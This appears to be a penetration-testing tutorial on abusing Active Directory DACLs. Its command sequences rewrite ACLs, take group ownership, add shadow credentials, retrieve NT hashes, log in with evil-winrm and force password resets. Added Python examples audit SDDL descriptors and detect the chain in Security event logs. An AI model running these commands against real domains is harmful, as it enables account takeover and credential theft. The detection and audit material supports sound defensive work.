# DACL (Discretionary Access Control List) Attack

A DACL is the part of an object's security descriptor that lists the trustees (users and groups) which are allowed or denied access to that object in Active Directory. Each entry in the list is an ACE (Access Control Entry) that grants or denies specific rights to one trustee.

### Set Ownership of Group <a href="#set-ownership-of-group" id="set-ownership-of-group"></a>

Using [BloodyAD](https://github.com/CravateRouge/bloodyAD), we can set the user as the owner of a group.

```
# Install if it does not exist on your machine.
pipx install bloodyAD

bloodyAD --host dc.example.local -d example.local -u <username> -p <password> set owner <group-name> <username>
```

### Add Rights <a href="#add-rights" id="add-rights"></a>

We may be able to take full control of securable objects by obtaining the GenericAll permission on an OU (Organizational Unit).

#### 1. Ask TGT for Kerberos Authentication <a href="#id-1-ask-tgt-for-kerberos-authentication" id="id-1-ask-tgt-for-kerberos-authentication"></a>

If we want to use Kerberos authentication for the DACL attack, we first need to retrieve a TGT for the specific user. In addition, to avoid authentication errors caused by clock skew, synchronize the system time with the domain controller using `ntpdate` or `rdate`.

```
# Sync datetime with target system
sudo ntpdate <target-ip>
# or
sudo rdate -n <target-ip>

impacket-getTGT -dc-ip <target-ip> example.local/username:password
```

The `getTGT` command above dumps a `.ccache` file which stores the TGT.

After dumping the `.ccache` file, export its path in the `KRB5CCNAME` environment variable so that the following tools use it:

```
export KRB5CCNAME=username.ccache
```

#### 2. Read DACL <a href="#id-2-read-dacl" id="id-2-read-dacl"></a>

We can use `dacledit.py` from impacket. To use it, clone the repository and install the dependencies as below:

```
git clone https://github.com/fortra/impacket.git
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
# Install impacket from the cloned checkout so that the library matches the examples/ scripts
pip3 install .
python3 examples/dacledit.py --help
```

Note: This repository is updated frequently, so errors may occur. If so, use `git log` and `git checkout <prev_commit_id>` to revert to a previous commit and run it again.

Then run the following command:

```
python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k
```
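Reading a DACL is only useful if we can tell which entries matter. The following is an added example, not part of the original page or of the impacket/bloodyAD projects: it parses a security descriptor in SDDL form (the string exposed by the `Sddl` property of the object that PowerShell's `Get-Acl` returns for an `AD:` path) and reports the owner (the field the Set Ownership step above changes) and every allow-ACE that hands a non-administrative trustee the rights this page adds or abuses (GenericAll, WriteDacl, WriteOwner, write access to `member` or `msDS-KeyCredentialLink`, User-Force-Change-Password). The sample SDDL, the SIDs in it and the allow-list of expected administrative trustees are constructed for the example; the rights codes and GUIDs are the documented SDDL codes and AD schema/extended-rights GUIDs.

```python
"""Audit an Active Directory object's security descriptor (SDDL form) for
risky ownership and ACEs. Added example; the SDDL, SIDs and allow-list below
are constructed for illustration."""
import re
from dataclasses import dataclass

# SDDL two-letter access-right codes (subset used for directory objects)
RIGHT_NAMES = {
    "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite", "GX": "GenericExecute",
    "RC": "ReadControl", "SD": "Delete", "WD": "WriteDacl", "WO": "WriteOwner",
    "RP": "ReadProperty", "WP": "WriteProperty", "CC": "CreateChild", "DC": "DeleteChild",
    "LC": "ListChildren", "SW": "Self", "LO": "ListObject", "DT": "DeleteTree",
    "CR": "ControlAccess",
}
# Rights that let the trustee take over the object as a whole
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
# Extended rights (rightsGuid) that are worth a finding on their own
CONTROL_ACCESS_GUIDS = {
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Attributes (schemaIDGUID) whose write access equals control of the object
SENSITIVE_ATTRIBUTE_GUIDS = {
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "member",
    "5b47d60f-6090-40b2-9f37-2a4de88f3063": "msDS-KeyCredentialLink",
}
# Trustees expected to hold full control; constructed allow-list, tune per domain
EXPECTED_ADMINS = {"SY", "BA", "DA", "EA"}

ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass
class Ace:
    ace_type: str      # A = allow, D = deny, OA = object allow, OD = object deny
    rights: list       # decoded right names
    object_guid: str   # lower-case GUID, or "" for the whole object
    trustee: str       # SID string or SDDL alias such as BA


def parse_rights(field):
    """Decode the rights field: concatenated two-letter codes or a hex mask."""
    if field.startswith("0x"):
        return [f"mask:{field}"]   # raw masks are reported, not decoded, here
    return [RIGHT_NAMES.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)]


def parse_sddl(sddl):
    """Return (owner, [Ace, ...]) from the O: and D: sections of an SDDL string."""
    owner = re.search(r"O:(.*?)(?=G:|D:|S:|$)", sddl)
    dacl = re.search(r"D:(.*?)(?=S:|$)", sddl)
    aces = []
    for body in ACE_RE.findall(dacl.group(1) if dacl else ""):
        parts = body.split(";")
        if len(parts) != 6:
            continue   # conditional / resource-attribute ACEs are out of scope
        aces.append(Ace(parts[0], parse_rights(parts[2]), parts[3].lower(), parts[5]))
    return (owner.group(1) if owner else None), aces


def find_risky_aces(sddl, expected=EXPECTED_ADMINS):
    """List (trustee, reason) pairs for ownership or allow-ACEs that give a
    non-administrative trustee control over the object."""
    owner, aces = parse_sddl(sddl)
    findings = []
    if owner and owner not in expected:
        findings.append((owner, "Owner"))
    for ace in aces:
        if ace.ace_type not in ("A", "OA") or ace.trustee in expected:
            continue
        for right in ace.rights:
            if right in TAKEOVER_RIGHTS:
                findings.append((ace.trustee, right))
            elif right == "WriteProperty":
                if not ace.object_guid:
                    findings.append((ace.trustee, "WriteProperty(all attributes)"))
                elif ace.object_guid in SENSITIVE_ATTRIBUTE_GUIDS:
                    findings.append((ace.trustee, "WriteProperty:" + SENSITIVE_ATTRIBUTE_GUIDS[ace.object_guid]))
            elif right == "ControlAccess":
                if not ace.object_guid:
                    findings.append((ace.trustee, "AllExtendedRights"))
                elif ace.object_guid in CONTROL_ACCESS_GUIDS:
                    findings.append((ace.trustee, CONTROL_ACCESS_GUIDS[ace.object_guid]))
    return findings


# Constructed descriptor for an OU: admins hold full control as expected, but a
# regular user (RID 1105) owns it and has GenericAll, another user may force a
# password change, and a third may edit group membership.
SAMPLE_SDDL = (
    "O:S-1-5-21-1-2-3-1105G:DAD:PAI"
    "(A;;RPWPCRLCLOCCDCSWWDWO;;;BA)"
    "(A;;GA;;;SY)"
    "(A;;GA;;;S-1-5-21-1-2-3-1105)"
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1-2-3-1107)"
    "(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-1-2-3-1108)"
    "(A;;RPLC;;;AU)"
)

if __name__ == "__main__":
    for trustee, reason in find_risky_aces(SAMPLE_SDDL):
        print(f"{trustee:28} {reason}")
```

Running it over the constructed descriptor lists the owner, the GenericAll grant to the same RID-1105 user, the force-password-change right of RID 1107 and the `member` write of RID 1108; the administrators' full-control entries and the Authenticated Users read entry are silent. Hex rights masks and conditional ACEs are passed through rather than decoded, so a real audit should resolve SIDs to names and extend the tables to the attributes that matter in the domain.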

#### 3. Write DACL <a href="#id-3-write-dacl" id="id-3-write-dacl"></a>

```
python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn 'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn 'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
```

### Abuse <a href="#abuse" id="abuse"></a>

After adding rights, we can abuse them with various methods.

#### Method 1. Add User to Group → Get TGT → Get NT Hash <a href="#method-1-add-user-to-group-get-tgt-get-nt-hash" id="method-1-add-user-to-group-get-tgt-get-nt-hash"></a>

```
# 1. Add the user to a specific group (replace the group distinguished name with your target)
bloodyAD --host <target-ip> -u <username> -p <password> add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>

# 2. Add a key credential to the target user with pywhisker (it writes a PFX file and prints its password)
python3 pywhisker.py -d example.local -u <username> -p <password> --target <target-username> --action add

# 3. Obtain a Kerberos TGT for the target user via PKINIT with the PFX certificate
python3 gettgtpkinit.py example.local/<target-username> -cert-pfx <pfx-filepath> -pfx-pass <pfx-password> ./example.ccache

export KRB5CCNAME=./example.ccache

# 4. Retrieve the NT hash of the target user (-key is the AS-REP encryption key printed by gettgtpkinit.py)
python3 getnthash.py example.local/<target-username> -key <key>

# 5. Log in with the retrieved NT hash
evil-winrm -i <target-ip> -u <target-username> -H <nt-hash>
```

#### Method 2. Set Password of Another User <a href="#method-2-set-password-of-another-user" id="method-2-set-password-of-another-user"></a>

If a user has the permission to reset another user's password, we can change that password:

```
bloodyAD --host <target-ip> -u <username> -p <password> set password '<target-username>' '<new-password>'
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k set password '<target-username>' '<new-password>'
```
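Every step in the Write DACL section and in the two abuse methods above leaves a record in the Windows Security log when Directory Service Changes and Account Management auditing are enabled: a rewritten DACL or owner appears as Event ID 5136 on the `nTSecurityDescriptor` attribute, the key credential write as 5136 on `msDS-KeyCredentialLink`, a group addition as 4728/4732/4756, and a password reset as 4724. The following is an added example, not part of the original page or of any of the tools it uses: it classifies constructed event records (shaped like the fields a SIEM extracts from `Security.evtx`) and flags accounts that perform several distinct steps of the chain. The event values, account names, group names and the privileged-group list are constructed for the example.

```python
"""Flag Windows Security events that correspond to the DACL-abuse chain on
this page. Added example; the event records below are constructed."""
from collections import defaultdict

# 5136 (directory service object modified): attributes whose change matters
SENSITIVE_ATTRIBUTES = {
    "nTSecurityDescriptor": ("dacl_change", "DACL or owner rewritten"),
    "msDS-KeyCredentialLink": ("shadow_credential", "key credential added"),
}
# "member added" events, keyed by event ID, with the group scope they cover
GROUP_MEMBER_ADDED = {4728: "global", 4732: "domain local", 4756: "universal"}
# Groups whose membership changes always warrant a high-severity alert (constructed list)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Example Group"}
PASSWORD_RESET = 4724   # "An attempt was made to reset an account's password"


def classify(event):
    """Map one event to (severity, kind, description), or None if it is not an indicator."""
    eid = event.get("EventID")
    actor = event.get("SubjectUserName", "?")
    if eid == 5136:
        hit = SENSITIVE_ATTRIBUTES.get(event.get("AttributeLDAPDisplayName"))
        if hit is None:
            return None   # routine attribute change, e.g. replication bookkeeping
        kind, text = hit
        return ("high", kind, f"{text} on {event.get('ObjectDN')} by {actor}")
    if eid in GROUP_MEMBER_ADDED:
        group = event.get("TargetUserName", "?")
        severity = "high" if group in PRIVILEGED_GROUPS else "medium"
        return (severity, "group_add",
                f"{event.get('MemberName')} added to {GROUP_MEMBER_ADDED[eid]} group {group} by {actor}")
    if eid == PASSWORD_RESET:
        return ("medium", "password_reset",
                f"password reset for {event.get('TargetUserName')} by {actor}")
    return None


def alerts_by_actor(events):
    """Group indicators by the account that performed them."""
    grouped = defaultdict(list)
    for event in events:
        alert = classify(event)
        if alert:
            grouped[event.get("SubjectUserName", "?")].append(alert)
    return dict(grouped)


def suspicious_actors(events, min_kinds=2):
    """Accounts showing at least min_kinds distinct indicator kinds. A single DACL
    edit may be legitimate administration; DACL edit plus group add plus
    password reset from the same account within one log window rarely is."""
    return sorted(actor for actor, alerts in alerts_by_actor(events).items()
                  if len({kind for _, kind, _ in alerts}) >= min_kinds)


# Constructed events: one account walks the whole chain, a DC writes a routine
# attribute, and a helpdesk account performs a single password reset.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "jsmith",
     "ObjectDN": "OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4728, "SubjectUserName": "jsmith", "TargetUserName": "Example Group",
     "MemberName": "CN=jsmith,CN=Users,DC=EXAMPLE,DC=LOCAL"},
    {"EventID": 5136, "SubjectUserName": "jsmith",
     "ObjectDN": "CN=svc_backup,OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 4724, "SubjectUserName": "jsmith", "TargetUserName": "svc_backup"},
    {"EventID": 5136, "SubjectUserName": "DC01$",
     "ObjectDN": "CN=RID Manager$,CN=System,DC=EXAMPLE,DC=LOCAL",
     "AttributeLDAPDisplayName": "rIDAvailablePool"},
    {"EventID": 4724, "SubjectUserName": "helpdesk1", "TargetUserName": "bob"},
]

if __name__ == "__main__":
    for actor, alerts in alerts_by_actor(SAMPLE_EVENTS).items():
        for severity, kind, text in alerts:
            print(f"[{severity:6}] {kind:18} {text}")
    print("chain suspects:", suspicious_actors(SAMPLE_EVENTS))
```

On the constructed log only `jsmith` is reported as a chain suspect: `DC01$` touches a non-sensitive attribute and `helpdesk1` produces one medium alert, which is routine on its own. In production the same logic should also key on the `OperationType` and `AttributeValue` fields of 5136 and window the events in time, since the actor of a DACL change is recorded on the domain controller that processed the write.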

After that, we can try further attacks using this user.

### References <a href="#references" id="references"></a>

* [The Hacker Recipes](https://www.thehacker.recipes/a-d/movement/dacl)
* [Microsoft Learn](https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists)
